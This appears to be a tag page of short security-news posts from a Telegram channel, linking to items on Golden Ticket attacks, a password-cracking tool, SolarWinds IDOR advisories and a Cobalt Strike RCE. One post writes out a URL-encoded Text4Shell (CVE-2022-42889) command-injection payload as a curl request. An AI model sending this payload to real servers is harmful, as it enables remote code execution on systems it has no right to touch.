All posts tagged cyber

■■■■□ Fighting Golden Ticket Attacks with Privileged Attribute Certificate (PAC). https://www.varonis.com/blog/pac_requestor-and-golden-ticket-attacks https://t.me/cKure/11874

● Domain ckure.xyz will be sundowned. Wef. Nov 22, ckure.org to replace the predecessor. https://t.me/cKure/11873

■■■■□ Tool: A web front-end for password cracking and analytics. https://github.com/hashview/hashview https://t.me/cKure/11872

■■■■■ Apache Text4Shell (CVE-2022-42889) curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D https://t.me/cKure/11870

Insecure Direct Object Reference Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966). https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966 https://t.me/cKure/11868

■■■■■ Insecure Direct Object Reference Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966). https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966 https://t.me/cKure/11867

● SolarWinds failed to revert to researcher and has not commented since. The researcher may share the details with us for public disclosure. https://t.me/cKure/11866

■■■■■ Insecure Direct Object Reference Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966). https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966 https://t.me/cKure/11865

Zero-Day: Critical Remote Code Execution issue impacts popular post-exploitation toolkit Cobalt Strike . Out Of Band Update: Cobalt Strike 4.7.2 https://securityaffairs.co/wordpress/137284/hacking/cobalt-strike-rce.html https://t.me/cKure/11864

Zero-Day: Critical Remote Code Execution issue impacts popular post-exploitation toolkit Cobalt Strike . Out Of Band Update: Cobalt Strike 4.7.2 https://securityaffairs.co/wordpress/137284/hacking/cobalt-strike-rce.html https://t.me/cKure/11863